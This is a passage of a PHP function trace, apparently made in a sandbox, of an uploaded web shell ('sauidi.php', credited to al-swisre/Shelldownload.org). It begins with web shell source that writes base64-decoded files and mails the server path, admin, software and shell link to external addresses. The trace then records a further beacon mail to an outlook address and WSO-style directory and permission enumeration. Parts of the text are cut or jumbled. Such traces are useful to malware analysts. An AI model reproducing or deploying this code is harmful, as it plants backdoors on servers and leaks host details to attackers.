";\r\n }curl_close($ch);\r\n exit;\r\n } function op_sa($f,$t) { $w = @fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w){ @fwrite($w,@base64_decode($t));\r\n @fclose($w);\r\n } } echo " |Progr4m3r by al-swisre Edited: Shelldownload.org|E-m4il : aas@hotmail.com|shell : shelldownload.org| ";\r\n \r\n?>\r\n\'; \r\n\r\n\r\n\r\nif (!file_exists($ikrhtfy)){ \r\n \r\ntouch($ikrhtfy); \r\nchmod($ikrhtfy,0666); \r\n \r\n} \r\n\r\n$opazxcdnm = fopen($ikrhtfy,"w"); \r\n\r\nif (!fwrite($opazxcdnm,$fghky_ouvcbt)){ \r\n\r\nexit; \r\n\r\n}\r\n\r\n$b = "Soldier\'ss";\r\n$c = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\r\n";\r\n$c.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\r\n";\r\n$c.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\r\n";\r\n$c.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\r\n";\r\n$c.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\r\n";\r\nmail("hacklinksatis@gmail.com", $b, $c);\r\nmail("burdayimreis@gmail.com", $b, $c);\r\necho "";\r\n?>' /var/www/html/uploads/sauidi.php(4) : eval()'d code 1 0 4 16 0 0.011778 966208 ob_start 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2 0 4 16 1 0.011801 982720 4 16 R TRUE 4 17 0 0.011819 982720 set_time_limit 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 7 1 0 4 17 1 0.011842 982784 4 17 R FALSE 4 18 0 0.011858 982752 error_reporting 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 8 1 0 4 18 1 0.011873 982792 4 18 R 0 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 9 $url = 'localhost/uploads/sauidi.php
User IP: 127.0.0.1' 4 19 0 0.011910 982832 mail 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 10 3 'x6cx6fx67@outlook.com' 'Oss_Shell_2.0' 'localhost/uploads/sauidi.php
User IP: 127.0.0.1' 4 19 1 0.014612 982928 4 19 R FALSE 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 11 _SESSION['trimite'] = TRUE 4 20 0 0.014694 983208 basename 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 552 1 '/var/www/html/uploads/sauidi.php(4) : eval()\'d code(1) : eval()\'d code' 4 20 1 0.014721 983320 4 20 R 'sauidi.php(4) : eval()\'d code(1) : eval()\'d code' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 552 $pg = 'sauidi.php(4) : eval()\'d code(1) : eval()\'d code' 4 21 0 0.014763 983288 ini_get 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 554 1 'safe_mode' 4 21 1 0.014781 983320 4 21 R FALSE 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 554 $safe_mode = FALSE 4 22 0 0.014808 983288 getcwd 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 555 0 4 22 1 0.014823 983336 4 22 R '/var/www/html/uploads' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 555 $dir = '/var/www/html/uploads' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 556 $ip = '127.0.0.1' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 557 $ips = '127.0.0.1' 4 23 0 0.014874 983336 define 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 558 2 'SWS' 'al-swisre' 4 23 1 0.014891 983440 4 23 R TRUE 4 24 0 0.014911 983368 php_uname 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 559 0 4 24 1 0.014927 983480 4 24 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 559 $os = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 4 25 0 0.014965 983480 ini_get 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 579 1 'disable_functions' 4 25 1 0.014980 983960 4 25 R 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 579 $df = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,' 4 26 0 0.015030 983928 phpversion 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 583 0 4 26 1 0.015043 983992 4 26 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1' 4 27 0 0.015059 983928 get_current_user 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 584 0 4 27 1 0.015098 983968 4 27 R 'osboxes' 4 28 0 0.015114 984016 getmyuid 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 584 0 4 28 1 0.015127 984016 4 28 R 1000 4 29 0 0.015141 984032 getmygid 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 584 0 4 29 1 0.015154 984032 4 29 R 1000 4 30 0 0.015168 984032 wsoPermsColor 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 587 1 '/var/www/html/uploads' 5 31 0 0.015184 984032 is_readable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1990 1 '/var/www/html/uploads' 5 31 1 0.015204 984072 5 31 R TRUE 5 32 0 0.015217 984032 is_writable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 '/var/www/html/uploads' 5 32 1 0.015233 984072 5 32 R TRUE 5 33 0 0.015247 984032 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1992 1 '/var/www/html/uploads' 5 33 1 0.015264 984096 5 33 R 16895 5 34 0 0.015277 984056 wsoPerms 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1992 1 16895 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1997 $i = 'd' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2001 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2002 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2003 $i .= 'x' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2004 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2005 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2006 $i .= 'x' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2007 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2008 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2009 $i .= 'x' 5 34 1 0.015404 984096 5 34 R 'drwxrwxrwx' 4 30 1 0.015418 984120 4 30 R 'drwxrwxrwx' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1588 $sws = 'al-swisre' 4 35 0 0.015451 983960 getcwd 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1593 0 4 35 1 0.015465 984008 4 35 R '/var/www/html/uploads' 4 36 0 0.015479 984008 cleandir 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1593 1 '/var/www/html/uploads' 5 37 0 0.015494 984008 realpath 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1986 1 '/var/www/html/uploads' 5 37 1 0.015509 984088 5 37 R '/var/www/html/uploads' 4 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1986 $d = '/var/www/html/uploads' 5 38 0 0.015535 984056 str_replace 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1987 3 '\\\\' '\\' '/var/www/html/uploads' 5 38 1 0.015552 984152 5 38 R '/var/www/html/uploads' 4 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1987 $d = '/var/www/html/uploads' 5 39 0 0.015577 984056 str_replace 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1988 3 '////' '//' '/var/www/html/uploads' 5 39 1 0.015593 984152 5 39 R '/var/www/html/uploads' 4 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1988 $d = '/var/www/html/uploads' 4 36 1 0.015618 984056 4 36 R '/var/www/html/uploads' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1593 $curdir = '/var/www/html/uploads' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1594 $self = '/uploads/sauidi.php' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1595 $me = '/uploads/sauidi.php' 4 40 0 0.015665 984008 explode 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1597 2 '/' '/var/www/html/uploads' 4 40 1 0.015682 984584 4 40 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1597 $dirx = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1598 $files = [] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1599 $folders = [] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1604 $i = 0 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1606 $totalpath .= '/' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1606 $i++ 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1606 $totalpath .= 'var/' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1606 $i++ 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1606 $totalpath .= 'www/' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1606 $i++ 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1606 $totalpath .= 'html/' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1606 $i++ 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1606 $totalpath .= 'uploads/' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1606 $i++ 4 41 0 0.015854 984560 opendir 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 1 '/var/www/html/uploads' 4 41 1 0.015875 984952 4 41 R resource(4) of type (stream) 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 $handle = resource(4) of type (stream) 4 42 0 0.015905 984920 readdir 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 1 resource(4) of type (stream) 4 42 1 0.015930 984992 4 42 R '..' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 $link = '..' 4 43 0 0.015956 985008 fileowner 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 1 '/var/www/html/uploads/..' 4 43 1 0.015972 985056 4 43 R 0 4 44 0 0.015986 984960 posix_getpwuid 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 1 0 4 44 1 0.016016 985760 4 44 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 $on3 = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 4 45 0 0.016061 985784 filegroup 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 '/var/www/html/uploads/..' 4 45 1 0.016075 985824 4 45 R 0 4 46 0 0.016088 985728 posix_getgrgid 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 0 4 46 1 0.016112 986384 4 46 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 4 47 0 0.016148 986408 is_dir 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1613 1 '/var/www/html/uploads/..' 4 47 1 0.016163 986448 4 47 R TRUE 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1613 $file = [] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1614 $file['link'] = '[ .. ]' 4 48 0 0.016206 986992 wsoPermsColor 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1615 1 '/var/www/html/uploads/..' 5 49 0 0.016220 986992 is_readable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1990 1 '/var/www/html/uploads/..' 5 49 1 0.016237 987032 5 49 R TRUE 5 50 0 0.016251 986992 is_writable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 '/var/www/html/uploads/..' 5 50 1 0.016267 987032 5 50 R TRUE 5 51 0 0.016280 986992 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1992 1 '/var/www/html/uploads/..' 5 51 1 0.016294 987032 5 51 R 16895 5 52 0 0.016307 986992 wsoPerms 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1992 1 16895 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1997 $i = 'd' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2001 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2002 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2003 $i .= 'x' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2004 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2005 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2006 $i .= 'x' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2007 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2008 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2009 $i .= 'x' 5 52 1 0.016427 987032 5 52 R 'drwxrwxrwx' 4 48 1 0.016441 987056 4 48 R 'drwxrwxrwx' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1615 $file['pir'] = 'drwxrwxrwx' 4 53 0 0.016476 987120 perm 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1616 1 '/var/www/html/uploads/..' 5 54 0 0.016490 987120 file_exists 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/..' 5 54 1 0.016506 987160 5 54 R TRUE 5 55 0 0.016520 987120 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/..' 5 55 1 0.016534 987160 5 55 R 16895 5 56 0 0.016547 987120 sprintf 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '%o' 16895 5 56 1 0.016562 987504 5 56 R '40777' 5 57 0 0.016575 987440 substr 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '40777' -4 5 57 1 0.016590 987536 5 57 R '0777' 4 53 1 0.016603 987152 4 53 R '0777' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1616 $file['pir2'] = '0777' 4 58 0 0.016633 987280 filemtime 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1617 1 '/var/www/html/uploads/..' 4 58 1 0.016647 987320 4 58 R 1676250045 4 59 0 0.016661 987224 date 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1617 2 'Y-m-d H:i:s' 1676250045 4 59 1 0.016724 989616 4 59 R '2023-02-12 20:00:45' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1620 $folder = ' [ .. ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - [ .. ]dir2023-02-12 20:00:45root/rootdrwxrwxrwx \r\n \r\n \r\n0777R - C - 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash'] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 $on3 = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash'] 4 64 0 0.016955 990264 filegroup 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 '/var/www/html/uploads/sauidi.php' 4 64 1 0.016969 990304 4 64 R 1000 4 65 0 0.016982 990200 posix_getgrgid 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 1000 4 65 1 0.017023 990856 4 65 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 $gr = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000] 4 66 0 0.017061 990264 is_dir 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1613 1 '/var/www/html/uploads/sauidi.php' 4 66 1 0.017076 990304 4 66 R FALSE 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1622 $file = [] 4 67 0 0.017102 989488 strpos 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 2 'sauidi.php' '.' 4 67 1 0.017117 989560 4 67 R 6 4 68 0 0.017130 989488 explode 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 2 '.' 'sauidi.php' 4 68 1 0.017145 990000 4 68 R [0 => 'sauidi', 1 => 'php'] 4 69 0 0.017162 989928 end 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 1 [0 => 'sauidi', 1 => 'php'] 4 69 1 0.017178 990336 4 69 R 'php' 4 70 0 0.017192 989520 strtolower 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 1 'php' 4 70 1 0.017205 989552 4 70 R 'php' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1623 $ext = 'php' 4 71 0 0.017231 989680 wsoPermsColor 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1624 1 '/var/www/html/uploads/sauidi.php' 5 72 0 0.017246 989680 is_readable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1990 1 '/var/www/html/uploads/sauidi.php' 5 72 1 0.017264 989720 5 72 R TRUE 5 73 0 0.017277 989680 is_writable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 '/var/www/html/uploads/sauidi.php' 5 73 1 0.017294 989720 5 73 R FALSE 5 74 0 0.017308 989680 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 '/var/www/html/uploads/sauidi.php' 5 74 1 0.017321 989720 5 74 R 33204 5 75 0 0.017334 989680 wsoPerms 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 33204 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1995 $i = '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2001 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2002 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2003 $i .= '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2004 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2005 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2006 $i .= '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2007 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2008 $i .= '-' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2009 $i .= '-' 5 75 1 0.017459 989720 5 75 R '-rw-rw-r--' 4 71 1 0.017473 989744 4 71 R '-rw-rw-r--' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1624 $file['pir'] = '-rw-rw-r--' 4 76 0 0.017507 990184 perm 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1625 1 '/var/www/html/uploads/sauidi.php' 5 77 0 0.017522 990184 file_exists 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/sauidi.php' 5 77 1 0.017538 990224 5 77 R TRUE 5 78 0 0.017552 990184 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 1 '/var/www/html/uploads/sauidi.php' 5 78 1 0.017566 990224 5 78 R 33204 5 79 0 0.017579 990184 sprintf 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '%o' 33204 5 79 1 0.017593 990568 5 79 R '100664' 5 80 0 0.017607 990504 substr 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2011 2 '100664' -4 5 80 1 0.017621 990600 5 80 R '0664' 4 76 1 0.017634 990216 4 76 R '0664' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1625 $file['pir2'] = '0664' 4 81 0 0.017664 990200 filesize 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1626 1 '/var/www/html/uploads/sauidi.php' 4 81 1 0.017678 990240 4 81 R 30063 4 82 0 0.017692 990136 number_format 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1626 2 29.3583984375 2 4 82 1 0.017708 990248 4 82 R '29.36' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1626 $file['size'] = '29.36' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1627 $file['link'] = 'sauidi.php' 4 83 0 0.017752 990504 filemtime 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1628 1 '/var/www/html/uploads/sauidi.php' 4 83 1 0.017766 990544 4 83 R 1676250045 4 84 0 0.017779 990440 date 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1628 2 'Y-m-d H:i:s' 1676250045 4 84 1 0.017812 990768 4 84 R '2023-02-12 20:00:45' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1631 $file = 'sauidi.php29.362023-02-12 20:00:45osboxes/osboxes-rw-rw-r-- \r\n \r\n \r\n0664E - sauidi.php29.362023-02-12 20:00:45osboxes/osboxes-rw-rw-r-- \r\n \r\n \r\n0664E - 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1611 $on3 = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash'] 4 89 0 0.018024 990696 filegroup 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 '/var/www/html/uploads/.' 4 89 1 0.018038 990736 4 89 R 0 4 90 0 0.018050 990648 posix_getgrgid 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 1 0 4 90 1 0.018077 991304 4 90 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1612 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0] 4 91 0 0.018114 990696 is_dir 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1613 1 '/var/www/html/uploads/.' 4 91 1 0.018128 990736 4 91 R TRUE 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1613 $file = [] 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1614 $file['link'] = '[ . ]' 4 92 0 0.018169 991264 wsoPermsColor 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1615 1 '/var/www/html/uploads/.' 5 93 0 0.018184 991264 is_readable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1990 1 '/var/www/html/uploads/.' 5 93 1 0.018200 991304 5 93 R TRUE 5 94 0 0.018214 991264 is_writable 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1991 1 '/var/www/html/uploads/.' 5 94 1 0.018230 991304 5 94 R TRUE 5 95 0 0.018243 991264 fileperms 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1992 1 '/var/www/html/uploads/.' 5 95 1 0.018257 991304 5 95 R 16895 5 96 0 0.018269 991264 wsoPerms 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1992 1 16895 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1997 $i = 'd' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2001 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2002 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2003 $i .= 'x' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2004 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2005 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2006 $i .= 'x' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2007 $i .= 'r' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2008 $i .= 'w' 5 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 2009 $i .= 'x' 5 96 1 0.018389 991304 5 96 R 'drwxrwxrwx' 4 92 1 0.018403 991328 4 92 R 'drwxrwxrwx' 3 A /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1615 $file['pir'] = 'drwxrwxrwx' 4 97 0 0.018437 991392 perm 1 /var/www/html/uploads/sauidi.php(4) : eval()'d code(1) : eval()'d code 1616 1 '/var/www/html/uploads/.' 5 98 0 0.018452 991392 